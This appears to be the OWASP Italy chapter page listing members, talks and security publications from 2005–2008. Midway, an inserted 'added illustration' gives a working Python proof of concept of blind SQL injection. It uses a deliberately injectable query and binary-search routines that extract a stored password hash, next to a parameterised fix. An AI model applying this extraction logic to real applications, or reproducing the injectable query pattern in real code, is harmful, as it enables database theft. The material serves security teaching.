Italy

NEWS: The presentations from the OWASP Day 1 conference are on-line!
[Here] you can download them.

NEXT EVENT: OWASP Italy at InfoSecurity 2008
5th February: Antonio Parata
 * 14:30 - "Costruire Software Sicuro dalle Fondamenta" (Building Secure Software from the Ground Up)

6th February: Paolo Perego
 * 14:30 - "The Owasp Orizon project: internals and hands on"

7th February: Luca Carettoni
 * 10:30 - "Tu programmi. Io buco." (You code. I break in.)

Here you can read more information about it.

Local Activities
 * There is already a qualified group (CISSP, CISA, BS7799 Lead Auditor, OPST, OPSA) of volunteers working on the following tasks:
   - Working on the new OWASP Testing Guide (Matteo Meucci, Alberto Revelli, Stefano Di Paola, Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin)
   - Translating all OWASP documentation into Italian (Matteo Paolelli, Massimiliano Graziani)
   - Writing articles about OWASP projects for infosecmag (Matteo Meucci, Alessandro Graziani, Lorenzo De Santis, Marco Graia, Luca Carettoni, Carlo Pelliccioni)
   - Working on the OWASP Legal project (Dario Vaccaro, Marco Scialdone)
   - Working on the OWASP Code Review project (Paolo Perego)
   - Developing WebAppSec tools & research (Stefano Di Paola, Daniele Bellucci, Alberto Revelli, Antonio Parata, Bernardo Damele)

OWASP-Italy Board
 * This is the (not official) OWASP-Italy Board:
   - Founder and Chair: Matteo Meucci
   - Director of Communication: Raoul Chiesa
   - Technical Director: Alberto Revelli
   - R&D Director: Stefano Di Paola
   - Technical Writer Director: Lorenzo De Santis
   - Italian translation of docs and papers: Matteo Paolelli, Massimiliano Graziani
   - Official active members: Giorgio Fedon, Luca Carettoni, Antonio Parata, Carlo Pelliccioni, Claudio Merloni, Mauro Bregolin, Paolo Perego, Daniele Bellucci, Bernardo Damele

What is OWASP?
Here you can read an interview about OWASP.

OWASP-Italy is a CLUSIT Member

Thanks to CLUSIT and the OWASP Foundation we have established a cross-membership between the two organizations: OWASP-Italy is now a CLUSIT member and CLUSIT is an OWASP Educational Member.

NEWS: OWASP-Italy at InfoSecurity 07
 * (Mar 07) Luca Carettoni has published an interview with OWASP-Italy (OWASP interviews OWASP :) ). Here the full article.
 * (Oct 06) ISACA Roma has published several interviews with OWASP-Italy members: [Matteo Meucci] [Alberto Revelli] [Antonio Parata] [Paolo Perego] [Carlo Pelliccioni]
 * (Sep 06) Paolo Perego has created the new OWASP Orizon Project. Go to OWASP Orizon Project
 * (Sep 06) Matteo Meucci has been selected as the new editor of the OWASP Testing Guide v2. See the OWASP press release and go to OWASP Testing Project v2
 * (Sep 06) Carlo Pelliccioni is writing an article about the analysis of error codes returned by web servers.
 * Top10 Vulnerabilities - OWASP-Italy survey:
 * (21 Jun 06) Infosecurity 2006: the event is organized and managed by CLUSIT. Alberto Revelli and Matteo Meucci will participate as speakers at the seminar "Web Application Security: guidelines and security auditing for web applications". More info here
 * (1 Jun 06) "Quaderno CLUSIT": CLUSIT has published a book entitled "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP" (Security assessment of web-based applications and the OWASP project). Several OWASP-Italy members (R. Chiesa, L. De Santis, M. Graziani, L. Legato, M. Meucci, A. Revelli) have contributed to the writing. The document is currently reserved to CLUSIT members, but will be made public in about 3 months.
 * (31 May 06) Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project" (Web application security according to the Open Web Application Security Project). Here you can read the full article.
 * (1 Mar 06) OWASP-Boston, Microsoft: thanks to Jim Weiler, Matteo Meucci has presented "Anatomy of two web attacks" at the OWASP-Boston meeting. More info here
 * (18 Nov 05) IDC - European Banking Forum: thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we will give a talk at the IDC European IT Banking Forum 2005. Agenda:
   - New standards for ICT security auditing in the Italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy, and Matteo Meucci, OWASP-Italy Chair
   - Workshop: unusual forms of attack and banking system breaches: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy
 * (Oct 05) SMAU 2005 is the 42nd International ICT & Consumer Electronics Exhibition for Italy. SMAU has accepted our submission! More info here
 * (Jun 05) Thanks to Massimiliano Graziani we have translated the "OWASP Pen Test Checklist v.1.1" into Italian. You can download it here. Thanks to the collaboration with CLUSIT, this document is also available here.
 * (May 05) The ISACA Roma Newsletter has published an interview with OWASP-Italy
 * (Apr 05) We have written an article describing the OWASP projects, Web Application Security and the next challenges. ICT Security (the Italian magazine about information security) has published the article in issue 33 - April 2005.
 * The presentation of the seminar we held at ISACA Rome (31st March 2005) is now available here.
 * (Apr 05) We have published a presentation describing a detailed case study of a web application vulnerability (MMS Spoofing).
 * (Mar 05) Thanks to Matteo Paolelli we have translated the "OWASP Top Ten Vulnerabilities in Web Application Security" into Italian. You can download it here.

November 30th, 2007 - OWASP-Italy @ Elsag Datamat Security Forum
Matteo Meucci was invited to talk about OWASP Guidelines and SDLC Security at the Elsag Datamat Security Forum 2007.
Where: Pescara
When: 30th November 2007, 12.30

October 20th, 2007 - OWASP Italy at SMAU E-Academy 2007
On 20th October 2007 we gave 5 talks at SMAU E-Academy 2007; here you can download our presentations:

 * Giorgio Fedon, COO at Minded Security: "Dove sono finiti i miei soldi? Internet Banking e Cross Site Scripting" (Where did my money go? Internet banking and Cross-Site Scripting) (coming soon)
 * Paolo Perego, Senior Security Consultant at Spike Reply: "The Owasp Orizon project - bring security at the source"
 * Antonio Parata, Security Consultant at eMaze: "Valutazione del rischio tramite la logica fuzzy" (Risk assessment through fuzzy logic) (coming soon)
 * Alberto Revelli, Senior Security Consultant at Portcullis Security: "Anti-Anti-XSS: bypass delle difese del browser" (Anti-Anti-XSS: bypassing browser defenses)
 * Stefano Di Paola, CTO at Minded Security: "Cross-site Flashing! Gli attacchi Web di ultima generazione parlano multipiattaforma" (Cross-site Flashing! The latest generation of web attacks is multiplatform) (coming soon)

September 10th, 2007 - OWASP Day WorldWide: "Privacy in the 21st Century"


Thanks to the collaboration with the Master in Information Security of the Università di Roma "La Sapienza", we organized the OWASP Day in Italy on 10th September 2007 during the Global Security Week. The event sponsor was Watchfire.

 * The topic was Web Application Security & Privacy and we had 6 talks: a technical set and a more high-level set.

Here is the agenda with the presentations:

Start of meeting: 9.15

 * 9.15-9.30. Prof. L. Mancini (Director of the Master in Information Security, Università "La Sapienza" Rome): "Welcome and opening of the works"
 * 9.30-9.45. M. Meucci (OWASP-Italy Chair, CEO Minded Security): "Introduction to the OWASP-Day and OWASP-Italy projects"
 * 9.45-10.15. Mauro Bregolin (Principal Consultant - KIMA Projects & Services): "Privacy in the digital era"
 * 10.15-10.45. Carlo Pelliccioni (Security Consultant - @Mediaservice.net): "OWASP Top 10 2007 - Is our information "really" safe?"
 * 10.45-11.15. Alberto Revelli (Senior Consultant - Portcullis Computer Security): "Anti-Anti-XSS: bypassing browser protections"
 * 11.15-11.45. Coffee break
 * 11.45-12.15. Laurent Petroque (F5): "Growing Application Security Awareness"
 * 12.15-12.45. Luca Carettoni (Security Consultant - SecureNetwork): "Buzzwords Security"
 * 12.45-13.30. Danny Allan (Director of Security Research - Watchfire): "Hacker Attacks on the Horizon: Understanding the Top Web 2.0 Attack Vectors"

 * Here you can download the audio
 * Pictures:
 * Participation: we received 160 registrations!

Here you can read about the global OWASP-Day.

May 29th, 2007 - Seminar: "Software Security"

 * Stefano Di Paola, Paolo Perego and Matteo Meucci will talk at the Seminar: "Which approaches to Software Security" organized by Firenze Tecnologia.

May 15th-17th, 2007 - 6th OWASP AppSec Conference in Italy
 * We are in the initial planning stages for the next OWASP Europe conference, which we plan to hold in Italy in May 2007.

Here you can find all the details about the conference, CFP and sponsorship.

April 14th, 2007 - Master on Information Security, University of Rome "La Sapienza"

 * We held a 4-hour seminar for the students of the Master in Information Security at "La Sapienza", as part of the Application Security Project of "La Sapienza" University.

March 30th, 2007 - University of Rome "La Sapienza"
 * Thanks to Prof. Mancini and Roberto D'Addario, we will talk about OWASP at the convention "Institutions, Companies and Information Security: comparing the problems"

Here you can find more details.

March 1st, 2007 - EuSecWest 07
Alberto Revelli and Matteo Meucci presented the new OWASP Testing Guide at EuSecWest. Here you can take a look at the presentation.

February 6th-8th, 2007 - InfoSecurity
 * February 6th, 15.30: after the great success obtained at the CCC in Berlin, Stefano Di Paola and Giorgio Fedon will talk about "Web Security Client Side: attacks at Web 2.0". More information here.

 * February 6th, 16.30: after the great effort on the Testing Guide project, Matteo Meucci and Alberto Revelli will present "The new OWASP Testing Guide". More information here.

 * February 7th, 12.30: authors of innovative SQL injection tools, Alberto Revelli and Antonio Parata will show "Advanced SQL Injection: testing tools and defensive strategies". More information here.

 * February 7th, 13.30: author of the new OWASP Orizon project, Paolo Perego will present "Secure programming: from theory to practice". More information here.

January 25th, 2007 - Isaca Rome
Matteo Meucci will discuss the new OWASP Testing Guide v2 For more information: http://www.isacaroma.it/html/GiornateDiStudio.html

October 7th, 2006 - SMAU 2006
- "The quest for secure code: code review and fundamentals of secure coding." Matteo Meucci will present an introduction to the new OWASP projects and OWASP-Italy activities. Paolo Perego (sp0nge) will speak about secure coding and the importance of periodic code review as a natural part of the software life cycle. Paolo will give an overview of code review and its phases. http://www.webb.it/event/eventview/5772

- "Advanced SQL Injection." Antonio Parata (S4tan) will explain SQL injection and how SQL inference works on the PHP/MySQL platform. He will present an open source tool to support the testing. Alberto Revelli (icesurfer) will focus on Microsoft SQL Server: he will perform a live demo of sqlninja (http://sqlninja.sf.net), explaining how to obtain a pseudo-shell over SQL, how to escalate privileges, and how to play with the exotic equation "SQL Injection + debug.exe + DNS = DOS prompt"! http://www.webb.it/event/eventview/5774

Here are the presentations:

Luca, Carlo, Alberto, Antonio, Stefano, Matteo, Paolo, Giorgio

September 29th, 2006 - OpenExp 2006
September 30th, at 10:45 Antonio Parata (S4tan) will speak about SQL Injection: techniques, tools and practical examples.

Abstract: Antonio will introduce some basic concepts of software security. He will show how SQL inference works on the PHP/MySQL platform and present an open source tool to support the testing. Finally, he will give some advice on avoiding common bugs. http://www.openexp.it/

OWASP-Italy will have a stand from September 29th to October 1st.
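The SMAU 2006 and OpenExp abstracts above both announce a talk on "SQL inference", i.e. blind SQL injection where the attacker never sees query output and recovers data one yes/no answer at a time. The following is an added illustration of that technique, not code from the talks, from sqlmap or from any other project named on this page. It assumes a PHP-style page that interpolates a user name into `SELECT ... WHERE name='...'` and only reveals whether a row matched; an in-memory SQLite database with a constructed `users` table stands in for MySQL, with SQLite's `unicode(substr(...))` playing the role of MySQL's `ASCII(SUBSTRING(...))`. The inference logic is the same on either DBMS.

```python
import sqlite3

# Constructed sample data (not from the page): a users table whose admin
# pw_hash column is the value the inference attack will reconstruct.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)")
DB.executemany("INSERT INTO users (name, pw_hash) VALUES (?, ?)",
               [("admin", "5f4dcc3b"), ("alice", "e99a18c4")])
DB.commit()

STATS = {"queries": 0}  # number of requests the "attacker" had to send


def vulnerable_lookup(name):
    """Stand-in for a PHP page doing mysql_query("... WHERE name='$name'").

    The caller only learns whether a row came back (the real page would show
    "welcome back" or "no such user"), never the query result. That single
    bit per request is all a blind/inference attack needs.
    """
    STATS["queries"] += 1
    sql = "SELECT id FROM users WHERE name = '%s'" % name  # deliberately injectable
    return DB.execute(sql).fetchone() is not None


def safe_lookup(name):
    """The fix: a bound parameter keeps the input out of the SQL grammar."""
    sql = "SELECT id FROM users WHERE name = ?"
    return DB.execute(sql, (name,)).fetchone() is not None


def oracle(condition):
    """Ask the application one yes/no question about the database."""
    # Close the string literal, AND in our condition, comment out the rest.
    return vulnerable_lookup("admin' AND (%s) -- " % condition)


def infer_length(expr, max_len=255):
    """Binary-search the length of an SQL expression's value (8 queries for max_len=255)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("length((%s)) > %d" % (expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_char(expr, pos):
    """Binary-search one character (7 queries for 7-bit ASCII).

    SQLite's unicode(substr(x, pos, 1)) is the equivalent of MySQL's
    ASCII(SUBSTRING(x, pos, 1)); everything else is identical.
    """
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("unicode(substr((%s), %d, 1)) > %d" % (expr, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract(expr):
    """Reconstruct the full value of an SQL expression one character at a time."""
    length = infer_length(expr)
    return "".join(infer_char(expr, pos) for pos in range(1, length + 1))


# A scalar subquery the attacker wants to read; MySQL accepts the same text.
SECRET_EXPR = "(SELECT pw_hash FROM users WHERE name = 'admin')"


def demo():
    """Run the attack and report the recovered value and the request count."""
    STATS["queries"] = 0
    value = extract(SECRET_EXPR)
    return value, STATS["queries"]


if __name__ == "__main__":
    value, n = demo()
    print("recovered %r with %d requests" % (value, n))
    print("same payload against the parameterised query:",
          safe_lookup("admin' AND (1=1) -- "))
```

Against the constructed table the attack recovers the 8-character hash with 64 requests (8 to learn the length, 7 per character), which is why inference tools are practical even though each request leaks only one bit. The parameterised `safe_lookup` treats the same payload as a literal user name and simply finds no row.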



June 21st, 2006 - InfoSecurity 2006
Alberto Revelli and Matteo Meucci will participate as speakers at the seminar "Web Application Security: guidelines and security auditing for web applications". The event is organized and managed by CLUSIT.

Where: Sheraton Roma Hotel - Viale Del Pattinaggio, 100
When: 10.30 - 17.00
Who: Matteo Meucci and Alberto Revelli
Link: http://www.infosecurity.it/Roma/programma.php

Agenda:
-- I Session --
 * Introduction to Web Application Security
   - What are the risks?
   - Risk assessment of a web application
   - Core pillars of web security
 * How to develop secure web applications
   - Guidelines and case studies

-- II Session --
 * How to carry out a security audit of a web application
   - The methodology: OWASP Penetration Testing
   - The tools: OWASP WebScarab
   - Hands-on web application vulnerabilities: OWASP WebGoat
   - Advanced SQL Injection

March 1st, 2006 - OWASP-Boston, Microsoft
Thanks to Jim Weiler (OWASP-Boston Chair), Matteo Meucci presented "Anatomy of two web attacks" at the March meeting of OWASP-Boston. More info here

November 18th, 2005 - IDC - European Banking Forum
Thanks to Raoul Chiesa (Director of Communication OWASP-Italy), we gave a talk at the IDC European IT Banking Forum 2005 (18 Nov 2005). http://www.idc.com/italy/events/banking05/banking05_agenda.jsp
Agenda:
 * New standards for ICT security auditing in the Italian banking scenario: OSSTMM and OWASP. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy, and Matteo Meucci, OWASP-Italy Chair
 * Workshop: unusual forms of attack and banking system breaches: live experience. Raoul Chiesa, Director of Communications, ISECOM/OWASP-Italy.

You can download the report here.

You can download the Case-Study of a vulnerable Home Banking Web Application here.

October 5th, 2005 - OWASP-Italy@SMAU2005
SMAU is the 42nd International ICT & Consumer Electronics Exhibition for Italy. Alberto Revelli (our Technical Director) and Matteo Meucci conducted a seminar on Web Application Security. Alberto presented his new project: sqlninja. Very cool!!

http://www.webb.it/event/eventview/4488/1/progetto_owasp__case_study_di_applicativi_web_vulnerabili

May 25th, 2005 - ISACA Rome 2nd meeting
On May 25th we'll be at ISACA Rome to present OWASP WebGoat and a real case of a web application vulnerability. Everyone is invited to join the meeting.

Here is the agenda:
14.30 Registration
14.45 Matteo Meucci - Web Application Security Phase II - OWASP WebScarab and PenTest Checklist
 * A case-study of a Web Application Vulnerability: MMS Spoofing
   - Web application analysis
   - Authentication and billing of the MMS service
   - Vulnerabilities
   - Attack analysis
   - HTTP basics
   - HTML clues
   - Hidden field tampering
   - How to spoof a session cookie
   - Stored Cross Site Scripting
   - Command Injection
   - SQL Injection
   - Fail-open authentication
 * Learning the most common web application vulnerabilities: OWASP WebGoat

The meeting is held at: Via Volturno, 65 (Rome) - Auditorium ATAC

You can download the presentation here.

May 18th, 2005 - Workshop on Computer Crime 2005
On May 18th, 2005 OWASP-Italy is invited to present the OWASP Top 10 at the "Workshop on Computer Crime 2005", titled "EVOLUZIONI NORMATIVE E RECENTI PROBLEMATICHE DI SICUREZZA" (Regulatory developments and recent security issues).

The meeting is held at: Sala delle conferenze dell'Istituto Centrale delle Banche Popolari Italiane, Via Verziere, 11

You can download the presentation here.

March 31st, 2005 - ISACA Rome meeting
On March 31st we'll be at ISACA Rome to present OWASP and Web Application Security. Everyone is invited to join the meeting.

Here is the agenda:
14.15 Registration
14.30 Matteo Meucci - Web Application Security
 - OWASP Guide: how to build secure web applications
 - How to test your web application: WebScarab and the WebApp PenTest Checklist
 - How to learn the most common web application vulnerabilities: WebGoat
 - The Top Ten WebApp vulnerabilities
 - Common errors in developing web applications:
   - Authentication mechanisms that are not "secure"
   - Buffer overflow and crash of the service
   - Identity theft: Cross Site Scripting
   - Manipulation of company data: SQL Injection
   - Confidential information: misconfiguration
   - Bad session management and identity theft
 - OWASP-Italy: projects and next challenges

The meeting is held at: Via Volturno, 65 (Rome) - Auditorium ATAC http://www.isacaroma.it/html/GiornateDiStudio.html

You can download the presentation here.

March 21st, 2005 - OWASP-Italy conducts a seminar at AlmaWeb
On March 21st OWASP-Italy was invited by the University of Bologna to conduct a seminar for the Master in Management and Information Technology, titled "Web Application Security and OWASP".

Here is the agenda:
 - OWASP & Web Application Security
 - Common Web Application Vulnerabilities
 - A real case of web application vulnerability: MMS Spoofing & Billing
 - Training: WebGoat

March, 2007 Interview on HTML.it
Luca Carettoni has published an interview with OWASP-Italy (OWASP interviews OWASP :) ). Here the full article.

October, 2006 ISACA Roma interviews OWASP-Italy
After the talks OWASP-Italy gave at SMAU E-Academy 2006, ISACA Roma interviewed some members of the Italian chapter. Follow the links for the full interviews (in Italian): [Matteo Meucci] [Alberto Revelli] [Antonio Parata] [Paolo Perego] [Stefano Di Paola & Giorgio Fedon]

Aug, 2006 - Article on Banca Finanza magazine
Banca Finanza, the Italian magazine about finance and banking, has interviewed Raoul Chiesa about the new risks for on-line banking security. Raoul speaks about OWASP and web application security. [[Media:042006BF.pdf]]

June, 2006 - Quaderno CLUSIT
CLUSIT has published a book entitled "La verifica della sicurezza di applicazioni Web-based e il progetto OWASP" (Security assessment of web-based applications and the OWASP project). Several OWASP-Italy members (R. Chiesa, L. De Santis, M. Graziani, L. Legato, M. Meucci, A. Revelli) have contributed to the writing. The document is currently reserved to CLUSIT members, but it will be made public in about 3 months.

June, 2006 - Paper on SQL Injection and Inference on PHP/MySQL
Antonio "s4tan" Parata has published an article about inference-based SQL injection for testing web applications on the PHP/MySQL platform. Here you can read the full article.

May, 2006 - Published an article about OWASP and Top-10 Vulnerabilities
Luca Carettoni has published the article "La sicurezza delle applicazioni Web secondo l'Open Web Application Security Project" (Web application security according to the Open Web Application Security Project). Here you can read the full article.

June, 2005 - OWASP Pen Test Checklist v 1.1 in Italian
Thanks to Massimiliano Graziani we have translated the "OWASP Pen Test Checklist v.1.1" into Italian. You can download it here. Thanks to the collaboration with CLUSIT, this document is also available here.

May, 2005 - Isaca Roma Newsletter about OWASP-Italy
The ISACA Roma Newsletter has published an interview with OWASP-Italy.

April, 2005 - Published "MMS Spoofing"
We have published a presentation describing a detailed case study of a web application vulnerability (MMS Spoofing).

Jim Hewitt, CISSP PMP, working at CGI-AMS, writes (slide #78): "Very interesting analysis of spoofed cell phone messaging and fraudulent billing". See: www.techvalleynyissa.org/Resources/2005_07_WebApplicationSecurity.ppt

April, 2005 - Published an article on ICT Security magazine
We have written an article describing the OWASP projects, Web Application Security and the next challenges. ICT Security (the Italian magazine about information security) has published the article in issue 33 - April 2005.

March, 2005 - OWASP Top-10 in Italian
Thanks to Matteo Paolelli we have translated the "OWASP Top Ten Vulnerabilities in Web Application Security" into Italian. You can download it here.

Nov, 2007 - sqlmap v0.5
Bernardo Damele and Daniele Bellucci have released version 0.5 of sqlmap. sqlmap is an automatic SQL injection tool written entirely in Python. It can extensively fingerprint the back-end database management system, retrieve remote DBMS databases, usernames, tables and columns, enumerate the entire DBMS, read system files and much more, taking advantage of web application programming flaws that lead to SQL injection vulnerabilities.

You can download the latest stable version from its SourceForge File List page or the latest development version from its SourceForge SVN repository.

Dec, 2006 - sqlmap v0.2
Bernardo Damele and Daniele Bellucci have released version 0.2 of "sqlmap", the tool for automatic blind SQL injection. Here you can download the tool.

September, 2006 - Wisec Project
Stefano Di Paola is developing Wisec - The Wiki Security Project. Here you can access the project.

July, 2006 - Sqlmap v0.0.1
Daniele Bellucci has developed the first version (0.0.1) of "sqlmap", a tool for automatic blind SQL injection. Here you can download the tool.